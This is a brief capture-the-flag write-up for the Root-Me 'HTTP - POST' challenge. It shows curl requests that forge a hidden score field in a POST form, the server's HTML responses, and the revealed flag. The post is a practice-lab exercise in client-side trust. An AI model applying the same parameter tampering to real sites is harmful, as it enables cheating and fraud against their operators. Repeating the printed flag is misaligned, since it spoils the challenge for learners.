Post

HTTP - POST

Posted
By thanguyen165 1 min read

Statement

Find a way to beat the top score!

Solution

1

curl http://challenge01.root-me.org/web-serveur/ch56/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<!DOCTYPE html>
<html>
    <head>
        <title>HTTP Basics</title>
    </head>

   <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
        <h1>RandGame</h1>
        <h2>Human vs. Machine</h2>
        <hr>
        <p>Here is my new game. It's not totally finished but I'm sure nobody can beat me! ;)</p>
        <ul>
            <li>Rules: click on the button to hope to generate a great score</li>
            <li>Score to beat: <strong>999999</strong></li>
        </ul>


        <form action="" method="post" onsubmit="document.getElementsByName('score')[0].value = Math.floor(Math.random() * 1000001)">
            <input type="hidden" name="score" value="-1" />
            <input type="submit" name="generate" value="Give a try!">
        </form>
    </body>
</html>

Let’s make a payload

1

curl -X POST --data "score=99999999999992&generate=Give+a+try%21" http://challenge01.root-me.org/web-serveur/ch56/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

<!DOCTYPE html>
<html>
    <head>
        <title>HTTP Basics</title>
    </head>

   <body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
        <h1>RandGame</h1>
        <h2>Human vs. Machine</h2>
        <hr>
        <p>Here is my new game. It's not totally finished but I'm sure nobody can beat me! ;)</p>
        <ul>
            <li>Rules: click on the button to hope to generate a great score</li>
            <li>Score to beat: <strong>999999</strong></li>
        </ul>

        <p>Wow, 99999999999992! How did you do that? :o</p><p>Flag to validate the challenge: <strong>H7tp_h4s_N0_s3Cr37S_F0r_y0U
</strong></p>
        <form action="" method="post" onsubmit="document.getElementsByName('score')[0].value = Math.floor(Math.random() * 1000001)">
            <input type="hidden" name="score" value="-1" />
            <input type="submit" name="generate" value="Give a try!">
        </form>
    </body>
</html>

The flag is

1

H7tp_h4s_N0_s3Cr37S_F0r_y0U
Practice, rootme
Web Exploitation
This post is licensed under CC BY 4.0 by the author.